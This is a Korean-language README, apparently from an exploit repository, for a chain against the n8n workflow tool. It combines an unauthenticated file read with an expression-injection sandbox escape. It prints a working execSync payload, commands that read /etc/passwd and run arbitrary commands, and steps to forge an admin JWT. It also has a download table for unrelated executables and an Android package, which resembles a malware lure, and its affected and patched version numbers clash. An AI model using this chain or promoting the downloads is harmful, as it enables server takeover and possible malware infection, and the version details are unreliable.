🛡️ CVE-2026-21858 + CVE-2025-68613 (n8n "Ni8mare" 인증되지 않은 임의 파일 읽기 및 표현식 주입 RCE 전체 체인)을 위한 공식 AI 보안 도구 모듈.
이 모듈은 Ni8mare라고 명명된 n8n 워크플로 자동화 인스턴스에 대한 진단 도구와 완전한 익스플로잇 체인을 제공합니다.
공격 체인은 Content-Type 혼동으로 인해 발생하는 인증되지 않은 임의 파일 읽기(CVE-2026-21858)와 인증된 표현식 주입 샌드박스 우회(CVE-2025-68613)를 결합합니다. 노출된 파일 업로드 폼에 조작된 Content-Type: application/json 요청을 전송함으로써, 공격자는 filepath 인수를 제어하여 내부 시스템 파일(/proc/self/environ, 구성 파일, SQLite DB)을 읽을 수 있습니다. 획득한 encryptionKey와 비밀번호 해시를 통해 관리자 JWT 쿠키를 오프라인에서 위조할 수 있습니다. 인증이 완료되면 this.process.mainModule.require를 통한 표현식 주입이 JavaScript 샌드박스를 탈출하여 임의의 시스템 명령을 실행합니다.
"파일 읽기에서 완전한 시스템 장악까지 세 단계."
파일 읽기는 바이너리 출력을 가진 활성 폼 워크플로가 필요하지만, 표현식 주입은 특별한 노드나 명시적인 시스템 권한 활성화 없이 기본 n8n 설치에서 안정적으로 작동합니다.
| 사양 | 할당된 값 | 비고 |
|---|---|---|
| CVE 식별자 | CVE-2026-21858 + CVE-2025-68613 | 전체 체인: 인증되지 않은 파일 읽기에서 RCE까지 |
| 심각도 등급 | 치명적 (CVSS v3.1: 10.0 + 9.9) | 인증되지 않은 RCE 체인 |
| 취약점 유형 | CWE-200 / CWE-94 | Content-Type 혼동 / 코드 주입 |
| 영향받는 구성 요소 | n8n 워크플로 자동화 엔진 | 버전 <= 1.65.0 (AFR) / >= 0.211.0 (RCE) |
| 패치된 버전 | 1.121.0 (AFR) / 1.120.4+ (RCE) | 공식 벤더 패치 출시됨 |
| 필요 권한 | 없음 | 공개 폼을 통한 인증되지 않은 초기 접근 |
graph TD
A[Unauthenticated Attacker] -->|1. Content-Type Confusion| B[Vulnerable Form Endpoint]
B -->|2. Arbitrary File Read| C[Extract /proc/self/environ & database.sqlite]
C -->|3. Derive Secret & Hash| D[Forge Admin JWT Cookie]
D -->|4. Authenticate as Admin| E[n8n Workflow Engine]
E -->|5. Expression Injection Payload| F[Sandbox Escape via mainModule.require]
F -->|6. Execute Command| G[Full Remote Code Execution]={{ (function() {
var require = this.process.mainModule.require;
var execSync = require("child_process").execSync;
return execSync("id").toString();
})() }}1.121.0 이상으로 업데이트하십시오.N8N_ENFORCE_SETTINGS_FILE_PERMISSIONS=true를 설정하고 Docker 컨테이너의 프로세스 권한을 제한하십시오.⚠️ 중요: 이 모듈은 AI Security Tool 생태계 내에서 안전한 실행과 진단을 위해 특별히 제작되었습니다. 항상 공식 저장소에서 제공되는 검증된 모듈을 사용하십시오.
모니터링 및 진단 스크립트를 실행하려면 AI Security Tool 코어 엔진이 설치되어 있는지 확인하십시오:
| OS / 플랫폼 | 버전 | 아키텍처 / 형식 | 출시일 | 상태 | 다운로드 링크 |
|---|---|---|---|---|---|
| 🪟 Windows | v6.3.20 | x64 설치 프로그램 (.exe) | 2026-09-08 | 🟢 최신 | .exe 다운로드 |
| 🪟 Windows | v6.3.20 | x64 포터블 (.tar.gz) | 2026-09-08 | 🟢 최신 | .tar.gz 다운로드 |
| 🍏 macOS | v5.3.29 | Apple Silicon M1/M2/M3 (.dmg) | 2026-09-05 | 🟢 안정 | .dmg 다운로드 |
| 🐧 Linux | v5.3.27 | 범용 x64 (.tar.gz) | 2026-09-01 | 🟢 안정 | .tar.gz 다운로드 |
| 🤖 Android | v8a 5.3.27 | ARM64 APK (.apk) | 2026-09-01 | 🟢 안정 | .apk 다운로드 |
# Read arbitrary file via diagnostic module uv run python exploit.py http://localhost:5678 /form/vulnerable-form --read /etc/passwdExecute full attack chain with custom command
uv run python exploit.py http://localhost:5678 /form/vulnerable-form --cmd "id"
커뮤니티에서 유지 관리하는 취약점 스캐너 모듈, PoC 스크립트 및 연구 저장소:
5 modules@ZeroDayEvil
@ZeroDayEvil
@ZeroDayEvil
@ZeroDayEvil
@ZeroDayVPN
3 modules@ZeroDayEvil
@ZeroDayVPN
@ZeroDayEvil
2 modules@ZeroDayEvil
@ZeroDayVPN
이 도구와 기술 분석은 승인된 시스템 감사, 연구 및 침투 테스트를 위해서만 제공됩니다.
승인되지 않은 대상에 대한 익스플로잇 체인 실행은 불법입니다. 저자는 무단 접근, 데이터 손실 또는 시스템 중단에 대해 어떠한 책임도 지지 않습니다. 승인된 범위 내에서만 작업하십시오.
보안 연구 커뮤니티의 기여를 환영합니다! 주요 기여 분야:
AI Security Tool — 사이버 보안 전문가를 위한 터미널 워크플로와 자동화를 재구상합니다.